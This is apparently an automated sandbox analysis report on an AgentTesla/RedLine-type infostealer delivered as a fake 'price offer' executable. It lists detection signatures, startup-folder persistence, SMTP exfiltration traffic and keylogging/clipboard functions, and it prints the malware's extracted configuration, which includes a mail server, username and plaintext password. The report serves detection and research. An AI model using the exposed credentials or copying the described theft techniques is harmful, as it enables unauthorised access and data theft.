7.2.RegSvcs.exe.2ae0ee8.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x40055:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x400c7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x40151:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x401e3:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x4024d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x402bf:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x40355:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x403e5:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
7.2.RegSvcs.exe.27503c6.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.RegSvcs.exe.27503c6.1.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
7.2.RegSvcs.exe.27503c6.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.RegSvcs.exe.27503c6.1.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3e255:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3e2c7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3e351:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x3e3e3:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3e44d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3e4bf:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3e555:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x3e5e5:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
7.2.RegSvcs.exe.3b46458.6.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.RegSvcs.exe.3b46458.6.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
7.2.RegSvcs.exe.3b46458.6.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.RegSvcs.exe.3b46458.6.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3e255:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3e2c7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3e351:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x3e3e3:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3e44d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3e4bf:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3e555:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x3e5e5:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
7.2.RegSvcs.exe.5240000.8.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.RegSvcs.exe.5240000.8.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
7.2.RegSvcs.exe.5240000.8.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.RegSvcs.exe.5240000.8.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3e255:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3e2c7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3e351:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x3e3e3:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3e44d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3e4bf:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3e555:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x3e5e5:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
7.2.RegSvcs.exe.3b45570.7.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.RegSvcs.exe.3b45570.7.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
7.2.RegSvcs.exe.3b45570.7.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.RegSvcs.exe.3b45570.7.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3f13d:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3f1af:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3f239:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x3f2cb:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3f335:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3f3a7:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3f43d:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x3f4cd:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
7.2.RegSvcs.exe.3b45570.7.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.RegSvcs.exe.3b45570.7.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
7.2.RegSvcs.exe.3b45570.7.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.RegSvcs.exe.3b45570.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x40f3d:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x8e875:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x40faf:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x8e8e7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x41039:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x8e971:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x410cb:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x8ea03:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x41135:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x8ea6d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x411a7:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x8eadf:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x4123d:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x8eb75:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x412cd:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548 0x8ec05:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
7.2.RegSvcs.exe.27503c6.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.RegSvcs.exe.27503c6.1.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
7.2.RegSvcs.exe.27503c6.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.RegSvcs.exe.27503c6.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x40055:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x400c7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x40151:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x401e3:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x4024d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x402bf:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x40355:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x403e5:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
7.2.RegSvcs.exe.2ae0000.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.RegSvcs.exe.2ae0000.4.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
7.2.RegSvcs.exe.2ae0000.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.RegSvcs.exe.2ae0000.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x40f3d:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x40faf:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x41039:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x410cb:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x41135:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x411a7:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x4123d:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x412cd:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
7.2.RegSvcs.exe.400000.0.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
7.2.RegSvcs.exe.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 ED 88 44 24 2B 88 44 24 2F B0 56 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
Click to see the 67 entries

Sigma Signatures

System Summary

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , ProcessId: 2196, ProcessName: wscript.exe

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 37.247.115.2, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 4852, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49725

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , ProcessId: 2196, ProcessName: wscript.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\directory\name.exe, ProcessId: 6080, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

Snort Signatures

ET TROJAN AgentTesla Exfil Via SMTP - Source IP: 192.168.2.6 - Destination IP: 37.247.115.2

Timestamp:	04/24/24-07:22:34.895574
SID:	2030171
Source Port:	49725
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN AgentTesla Exfil Via SMTP - Source IP: 192.168.2.6 - Destination IP: 37.247.115.2

Timestamp:	04/24/24-07:22:39.546628
SID:	2030171
Source Port:	49726
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN AgentTesla Exfil Via SMTP - Source IP: 192.168.2.6 - Destination IP: 37.247.115.2

Timestamp:	04/24/24-07:22:48.094441
SID:	2030171
Source Port:	49729
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN AgentTesla Exfil Via SMTP - Source IP: 192.168.2.6 - Destination IP: 37.247.115.2

Timestamp:	04/24/24-07:22:44.700473
SID:	2030171
Source Port:	49728
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 7.2.RegSvcs.exe.3b46458.6.raw.unpack	Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.aquareklam.com", "Username": "info@aquareklam.com", "Password": "Aqua1923"}
Source: 7.2.RegSvcs.exe.3b46458.6.raw.unpack	Malware Configuration Extractor: RedLine {"C2 url": ["mail.aquareklam.com"]}

Multi AV Scanner detection for submitted file

Source: F#U0130YAT TEKL#U0130F.exe	ReversingLabs: Detection: 47%
Source: F#U0130YAT TEKL#U0130F.exe	Virustotal: Detection: 39%			Perma Link

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\directory\name.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: F#U0130YAT TEKL#U0130F.exe

Joe Sandbox ML: detected

Source: F#U0130YAT TEKL#U0130F.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.6:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.6:49727 version: TLS 1.2

Source:	Binary string: _.pdb source: RegSvcs.exe, 00000007.00000002.3838840579.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3835842078.000000000270F000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3837117368.0000000002AE0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.4570703429.000000000322D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.4574444368.0000000004693000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: name.exe, 00000006.00000003.3712788813.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000006.00000003.3713380322.0000000003860000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000A.00000003.3829363478.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000A.00000003.3830095011.0000000003A60000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: name.exe, 00000006.00000003.3712788813.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000006.00000003.3713380322.0000000003860000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000A.00000003.3829363478.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000A.00000003.3830095011.0000000003A60000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Code function: 0_2_009EDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_009EDBBE
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Code function: 0_2_009BC2A2 FindFirstFileExW,	0_2_009BC2A2
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Code function: 0_2_009F68EE FindFirstFileW,FindClose,	0_2_009F68EE
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Code function: 0_2_009F698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_009F698F
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Code function: 0_2_009ED076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_009ED076
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Code function: 0_2_009ED3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_009ED3A9
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Code function: 0_2_009F9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_009F9642
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Code function: 0_2_009F979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_009F979D
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Code function: 0_2_009F9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_009F9B2B
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Code function: 0_2_009F5C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_009F5C97
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_0101DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	6_2_0101DBBE
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_00FEC2A2 FindFirstFileExW,	6_2_00FEC2A2
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_0102698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	6_2_0102698F
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_010268EE FindFirstFileW,FindClose,	6_2_010268EE
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_0101D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	6_2_0101D076
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_0101D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	6_2_0101D3A9
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_0102979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	6_2_0102979D
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_01029642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	6_2_01029642
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_01029B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	6_2_01029B2B
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_01025C97 FindFirstFileW,FindNextFileW,FindClose,	6_2_01025C97

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\	Jump to behavior

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.6:49725 -> 37.247.115.2:587
Source: Traffic	Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.6:49726 -> 37.247.115.2:587
Source: Traffic	Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.6:49728 -> 37.247.115.2:587
Source: Traffic	Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.6:49729 -> 37.247.115.2:587

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: mail.aquareklam.com

Source: global traffic

TCP traffic: 192.168.2.6:49725 -> 37.247.115.2:587

Source: Joe Sandbox View

IP Address: 104.26.12.205 104.26.12.205

Source: Joe Sandbox View

ASN Name: ACCESS2ITNL ACCESS2ITNL

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: global traffic

TCP traffic: 192.168.2.6:49725 -> 37.247.115.2:587

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe

Code function: 0_2_009FCE44 InternetReadFile,SetEvent,GetLastError,SetEvent,

0_2_009FCE44

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: api.ipify.org

Source: RegSvcs.exe, 00000007.00000002.3837231570.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3837231570.0000000002BD7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.4571149713.00000000036CE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.4571149713.00000000036BF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.aquareklam.com
Source: RegSvcs.exe, 00000007.00000002.3837231570.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.4571149713.0000000003650000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegSvcs.exe, 00000007.00000002.3838840579.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3835842078.000000000270F000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3837117368.0000000002AE0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3840117375.0000000005240000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://account.dyn.com/
Source: RegSvcs.exe, 00000007.00000002.3838840579.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3837231570.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3835842078.000000000270F000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3837117368.0000000002AE0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3840117375.0000000005240000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.4571149713.0000000003650000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: RegSvcs.exe, 00000007.00000002.3837231570.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.4571149713.0000000003650000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: RegSvcs.exe, 00000007.00000002.3837231570.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.4571149713.0000000003650000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/t

Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724

Source: unknown	HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.6:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.6:49727 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 7.2.RegSvcs.exe.5240000.8.raw.unpack, K6raBsUk6.cs

.Net Code: YvZf4568g

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe

Code function: 0_2_009FEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_009FEAFF

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Code function: 0_2_009FED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		0_2_009FED6A
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_0102ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		6_2_0102ED6A

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe

0_2_009FEAFF

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe

Code function: 0_2_009EAA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,

0_2_009EAA57

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Code function: 0_2_00A19576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		0_2_00A19576
